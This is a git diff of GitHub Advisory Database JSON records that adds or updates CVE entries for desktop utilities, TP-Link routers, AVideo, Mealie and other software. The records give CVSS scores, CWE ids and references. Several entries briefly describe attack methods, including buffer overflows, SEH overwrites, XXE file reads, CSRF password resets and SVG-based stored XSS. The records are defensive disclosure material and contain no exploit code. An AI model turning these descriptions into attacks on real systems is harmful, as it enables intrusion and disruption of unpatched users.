+ { + "type": "WEB", + "url": "https://github.com/medusajs/medusa/pull/13760" + }, + { + "type": "WEB", + "url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69871-MedusaJS-TOCTOU.md" + }, + { + "type": "WEB", + "url": "https://github.com/medusajs/medusa" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-6vgg-p398-7vm9/GHSA-6vgg-p398-7vm9.json b/advisories/unreviewed/2026/02/GHSA-6vgg-p398-7vm9/GHSA-6vgg-p398-7vm9.json new file mode 100644 index 0000000000000..0175eed3fdb2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-6vgg-p398-7vm9/GHSA-6vgg-p398-7vm9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6vgg-p398-7vm9", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37190" + ], + "details": "Top Password Firefox Password Recovery 2.8 contains a denial of service vulnerability that allows attackers to crash the application by overflowing input fields. Attackers can trigger the vulnerability by inserting 5000 characters into the User Name or Registration Code input fields.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37190" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47912" + }, + { + "type": "WEB", + "url": "https://www.top-password.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/top-password-firefox-password-recovery-denial-of-service" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7679-g48g-fxpc/GHSA-7679-g48g-fxpc.json b/advisories/unreviewed/2026/02/GHSA-7679-g48g-fxpc/GHSA-7679-g48g-fxpc.json index 6d9e8d56d1163..404f3b91daaf2 100644 --- a/advisories/unreviewed/2026/02/GHSA-7679-g48g-fxpc/GHSA-7679-g48g-fxpc.json +++ b/advisories/unreviewed/2026/02/GHSA-7679-g48g-fxpc/GHSA-7679-g48g-fxpc.json @@ -54,7 +54,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-7ghp-xq34-m769/GHSA-7ghp-xq34-m769.json b/advisories/unreviewed/2026/02/GHSA-7ghp-xq34-m769/GHSA-7ghp-xq34-m769.json index 7dea385e8e3ee..af3be32a18ffb 100644 --- a/advisories/unreviewed/2026/02/GHSA-7ghp-xq34-m769/GHSA-7ghp-xq34-m769.json +++ b/advisories/unreviewed/2026/02/GHSA-7ghp-xq34-m769/GHSA-7ghp-xq34-m769.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-7j3c-f9r5-fc2v/GHSA-7j3c-f9r5-fc2v.json b/advisories/unreviewed/2026/02/GHSA-7j3c-f9r5-fc2v/GHSA-7j3c-f9r5-fc2v.json index f17bdb0958f31..984b110ec8421 100644 --- a/advisories/unreviewed/2026/02/GHSA-7j3c-f9r5-fc2v/GHSA-7j3c-f9r5-fc2v.json +++ b/advisories/unreviewed/2026/02/GHSA-7j3c-f9r5-fc2v/GHSA-7j3c-f9r5-fc2v.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-7pgr-rh5j-x824/GHSA-7pgr-rh5j-x824.json b/advisories/unreviewed/2026/02/GHSA-7pgr-rh5j-x824/GHSA-7pgr-rh5j-x824.json new file mode 100644 index 0000000000000..b7c8a2791bbb6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7pgr-rh5j-x824/GHSA-7pgr-rh5j-x824.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7pgr-rh5j-x824", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37196" + ], + "details": "Dnss Domain Name Search Software contains a denial of service vulnerability that allows attackers to crash the application by providing an oversized registration key. Attackers can generate a 1000-character buffer payload and paste it into the registration key field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37196" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47856" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dnss-domain-name-search-software-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7vv3-8qfv-xjc7/GHSA-7vv3-8qfv-xjc7.json b/advisories/unreviewed/2026/02/GHSA-7vv3-8qfv-xjc7/GHSA-7vv3-8qfv-xjc7.json index a6005ec025928..b1b3a4433e4a2 100644 --- a/advisories/unreviewed/2026/02/GHSA-7vv3-8qfv-xjc7/GHSA-7vv3-8qfv-xjc7.json +++ b/advisories/unreviewed/2026/02/GHSA-7vv3-8qfv-xjc7/GHSA-7vv3-8qfv-xjc7.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8575-qvr6-9797/GHSA-8575-qvr6-9797.json b/advisories/unreviewed/2026/02/GHSA-8575-qvr6-9797/GHSA-8575-qvr6-9797.json index df11d6d8d0210..b5be2c21c347f 100644 --- a/advisories/unreviewed/2026/02/GHSA-8575-qvr6-9797/GHSA-8575-qvr6-9797.json +++ b/advisories/unreviewed/2026/02/GHSA-8575-qvr6-9797/GHSA-8575-qvr6-9797.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-8575-qvr6-9797", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:50Z", "aliases": [ "CVE-2025-59487" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tmpserver modules) allows authenticated adjacent attackers to cause a segmentation fault or potentially execute arbitrary code. The vulnerability arises from improper validation of a packet field whose offset is used to determine the write location in memory. By crafting a packet with a manipulated field offset, an attacker can redirect writes to arbitrary memory locations.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:H/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-862j-qqj8-4qr6/GHSA-862j-qqj8-4qr6.json b/advisories/unreviewed/2026/02/GHSA-862j-qqj8-4qr6/GHSA-862j-qqj8-4qr6.json new file mode 100644 index 0000000000000..313e75fd79b28 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-862j-qqj8-4qr6/GHSA-862j-qqj8-4qr6.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-862j-qqj8-4qr6", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37184" + ], + "details": "Allok Video Converter 4.6.1217 contains a stack overflow vulnerability in the License Name input field that allows attackers to execute arbitrary code. Attackers can craft a specially designed payload to overwrite SEH handlers and execute system commands by injecting malicious bytecode into the input field.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37184" + }, + { + "type": "WEB", + "url": "https://www.alloksoft.com" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47908" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/allok-video-converter-stack-overflow-seh" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-87p4-fg9r-8pmj/GHSA-87p4-fg9r-8pmj.json b/advisories/unreviewed/2026/02/GHSA-87p4-fg9r-8pmj/GHSA-87p4-fg9r-8pmj.json new file mode 100644 index 0000000000000..956f2a709756c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-87p4-fg9r-8pmj/GHSA-87p4-fg9r-8pmj.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-87p4-fg9r-8pmj", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37180" + ], + "details": "GTalk Password Finder 2.2.1 contains a denial of service vulnerability that allows attackers to crash the application by supplying an oversized registration key. Attackers can generate a 1000-character payload and paste it into the 'Key' field to trigger an application crash.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37180" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47942" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gtalk-password-finder-key-denial-of-service" + }, + { + "type": "WEB", + "url": "http://www.nsauditor.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8gp8-wgcp-qxqq/GHSA-8gp8-wgcp-qxqq.json b/advisories/unreviewed/2026/02/GHSA-8gp8-wgcp-qxqq/GHSA-8gp8-wgcp-qxqq.json new file mode 100644 index 0000000000000..5209647973428 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8gp8-wgcp-qxqq/GHSA-8gp8-wgcp-qxqq.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8gp8-wgcp-qxqq", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37176" + ], + "details": "Torrent 3GP Converter 1.51 contains a stack overflow vulnerability that allows attackers to execute arbitrary code by overwriting Structured Exception Handler (SEH) registers. Attackers can craft a malicious payload targeting the application's registration dialog to trigger code execution and open the calculator through carefully constructed buffer overflow techniques.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37176" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47965" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/torrent-gp-converter-stack-overflow-seh" + }, + { + "type": "WEB", + "url": "http://www.torrentrockyou.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json b/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json new file mode 100644 index 0000000000000..e3a815e9ca13e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8jg3-vm8w-m4r8/GHSA-8jg3-vm8w-m4r8.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8jg3-vm8w-m4r8", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2024-50618" + ], + "details": "A Use of Single-factor Authentication vulnerability in the Authentication component of CIPPlanner CIPAce before 9.17 allows attackers to bypass a protection mechanism. When the system is configured to allow login with internal accounts, an attacker can possibly obtain full authentication if the secret in a single-factor authentication scheme gets compromised.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50618" + }, + { + "type": "WEB", + "url": "https://cipplanner.com/cve-2024-50618-cve-public-notification-of-resolution" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T20:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-8q42-rp7q-f493/GHSA-8q42-rp7q-f493.json b/advisories/unreviewed/2026/02/GHSA-8q42-rp7q-f493/GHSA-8q42-rp7q-f493.json index 9d8f230550ca6..2c3299f8eb397 100644 --- a/advisories/unreviewed/2026/02/GHSA-8q42-rp7q-f493/GHSA-8q42-rp7q-f493.json +++ b/advisories/unreviewed/2026/02/GHSA-8q42-rp7q-f493/GHSA-8q42-rp7q-f493.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-8wgf-f4hv-w5qc/GHSA-8wgf-f4hv-w5qc.json b/advisories/unreviewed/2026/02/GHSA-8wgf-f4hv-w5qc/GHSA-8wgf-f4hv-w5qc.json new file mode 100644 index 0000000000000..dc47b8516edf0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8wgf-f4hv-w5qc/GHSA-8wgf-f4hv-w5qc.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8wgf-f4hv-w5qc", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37172" + ], + "details": "AVideo Platform 8.1 contains a cross-site request forgery vulnerability that allows attackers to reset user passwords by exploiting the password recovery mechanism. Attackers can craft malicious requests to the recoverPass endpoint using the user's recovery token to change account credentials without authentication.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37172" + }, + { + "type": "WEB", + "url": "https://avideo.com" + }, + { + "type": "WEB", + "url": "https://github.com/WWBN/AVideo" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/48003" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/avideo-platform-cross-site-request-forgery-password-reset" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-640" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json b/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json new file mode 100644 index 0000000000000..108707de3591c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-96g7-r737-95hv/GHSA-96g7-r737-95hv.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-96g7-r737-95hv", + "modified": "2026-02-11T21:30:39Z", + "published": "2026-02-11T21:30:39Z", + "aliases": [ + "CVE-2025-70297" + ], + "details": "A stored cross-site scripting (XSS) vulnerability in the recipe asset upload and media serving component in Mealie 3.3.1 allows remote authenticated users to inject arbitrary web script or HTML via an uploaded SVG file that is served as image/svg+xml and rendered by a victim s browser.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70297" + }, + { + "type": "WEB", + "url": "https://github.com/mealie-recipes/mealie/issues/6319" + }, + { + "type": "WEB", + "url": "https://github.com/chrisWalker11/Cves/blob/main/CVE-2025-70297/CVE-2025-70297.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T19:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-975r-cfgj-8mhf/GHSA-975r-cfgj-8mhf.json b/advisories/unreviewed/2026/02/GHSA-975r-cfgj-8mhf/GHSA-975r-cfgj-8mhf.json new file mode 100644 index 0000000000000..80b4d2546b4db --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-975r-cfgj-8mhf/GHSA-975r-cfgj-8mhf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-975r-cfgj-8mhf", + "modified": "2026-02-11T21:30:41Z", + "published": "2026-02-11T21:30:41Z", + "aliases": [ + "CVE-2020-37192" + ], + "details": "MSN Password Recovery 1.30 contains an XML external entity injection vulnerability that allows attackers to read local system files through crafted XML input. Attackers can exploit the 'Favorites' tab by injecting a malicious XML file that references external entities to retrieve sensitive system configuration information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37192" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47896" + }, + { + "type": "WEB", + "url": "https://www.top-password.com" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/msn-password-recovery-xml-external-entity-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-98w9-x492-wwm5/GHSA-98w9-x492-wwm5.json b/advisories/unreviewed/2026/02/GHSA-98w9-x492-wwm5/GHSA-98w9-x492-wwm5.json new file mode 100644 index 0000000000000..92a78b2d22c92 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-98w9-x492-wwm5/GHSA-98w9-x492-wwm5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-98w9-x492-wwm5", + "modified": "2026-02-11T21:30:40Z", + "published": "2026-02-11T21:30:40Z", + "aliases": [ + "CVE-2020-37177" + ], + "details": "BOOTP Turbo 2.0 contains a denial of service vulnerability that allows attackers to crash the application by overwriting the Structured Exception Handler (SEH). Attackers can generate a malicious payload of 2196 bytes with specific byte patterns to trigger an application crash and corrupt the SEH chain.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37177" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47955" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/bootp-turbo-denial-of-service-seh" + }, + { + "type": "WEB", + "url": "https://www.weird-solutions.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T21:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9cgv-px49-jxx3/GHSA-9cgv-px49-jxx3.json b/advisories/unreviewed/2026/02/GHSA-9cgv-px49-jxx3/GHSA-9cgv-px49-jxx3.json index e425cf34bdeb6..7357a45726008 100644 --- a/advisories/unreviewed/2026/02/GHSA-9cgv-px49-jxx3/GHSA-9cgv-px49-jxx3.json +++ b/advisories/unreviewed/2026/02/GHSA-9cgv-px49-jxx3/GHSA-9cgv-px49-jxx3.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-9h9g-xpmp-46vg/GHSA-9h9g-xpmp-46vg.json b/advisories/unreviewed/2026/02/GHSA-9h9g-xpmp-46vg/GHSA-9h9g-xpmp-46vg.json index 13dcf9cec09df..9f008bd6c3af6 100644 --- a/advisories/unreviewed/2026/02/GHSA-9h9g-xpmp-46vg/GHSA-9h9g-xpmp-46vg.json +++ b/advisories/unreviewed/2026/02/GHSA-9h9g-xpmp-46vg/GHSA-9h9g-xpmp-46vg.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-9jqj-4cr8-rr2f/GHSA-9jqj-4cr8-rr2f.json b/advisories/unreviewed/2026/02/GHSA-9jqj-4cr8-rr2f/GHSA-9jqj-4cr8-rr2f.json index 53888ff0d4a4c..f6e7ce946970a 100644 --- a/advisories/unreviewed/2026/02/GHSA-9jqj-4cr8-rr2f/GHSA-9jqj-4cr8-rr2f.json +++ b/advisories/unreviewed/2026/02/GHSA-9jqj-4cr8-rr2f/GHSA-9jqj-4cr8-rr2f.json @@ -30,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-122" + "CWE-122", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-9m5j-8278-v84q/GHSA-9m5j-8278-v84q.json b/advisories/unreviewed/2026/02/GHSA-9m5j-8278-v84q/GHSA-9m5j-8278-v84q.json index 589b57cbfae52..b2a363993dadf 100644 --- a/advisories/unreviewed/2026/02/GHSA-9m5j-8278-v84q/GHSA-9m5j-8278-v84q.json +++ b/advisories/unreviewed/2026/02/GHSA-9m5j-8278-v84q/GHSA-9m5j-8278-v84q.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-9m5j-8278-v84q", - "modified": "2026-02-03T21:31:51Z", + "modified": "2026-02-11T21:30:33Z", "published": "2026-02-03T21:31:51Z", "aliases": [ "CVE-2025-62673" ], "details": "Heap-based Buffer Overflow vulnerability in TP-Link Archer AX53 v1.0 (tdpserver modules) allows adjacent attackers to cause a segmentation fault or potentially execute arbitrary code via a specially crafted network packet containing a maliciously formed field.This issue affects Archer AX53 v1.0: through 1.3.1 Build 20241120.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-9q2m-h66x-q8hw/GHSA-9q2m-h66x-q8hw.json b/advisories/unreviewed/2026/02/GHSA-9q2m-h66x-q8hw/GHSA-9q2m-h66x-q8hw.json index 6ce8881426dbe..eb9e4fcc292dc 100644 --- a/advisories/unreviewed/2026/02/GHSA-9q2m-h66x-q8hw/GHSA-9q2m-h66x-q8hw.json +++ b/advisories/unreviewed/2026/02/GHSA-9q2m-h66x-q8hw/GHSA-9q2m-h66x-q8hw.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-9qmm-fmp8-wcfp/GHSA-9qmm-fmp8-wcfp.json b/advisories/unreviewed/2026/02/GHSA-9qmm-fmp8-wcfp/GHSA-9qmm-fmp8-wcfp.json index 2eff1b0f91fb9..9da0f202720a6 100644 --- a/advisories/unreviewed/2026/02/GHSA-9qmm-fmp8-wcfp/GHSA-9qmm-fmp8-wcfp.json +++ b/advisories/unreviewed/2026/02/GHSA-9qmm-fmp8-wcfp/GHSA-9qmm-fmp8-wcfp.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9qmm-fmp8-wcfp", - "modified": "2026-02-08T12:30:26Z", + "modified": "2026-02-11T21:30:35Z", "published": "2026-02-08T12:30:26Z", "aliases": [ "CVE-2026-2151" @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json b/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json new file mode 100644 index 0000000000000..bfbb5e822b6d5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c37x-p7mp-hh29/GHSA-c37x-p7mp-hh29.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c37x-p7mp-hh29", + "modified": "2026-02-11T21:30:40Z", + "published": 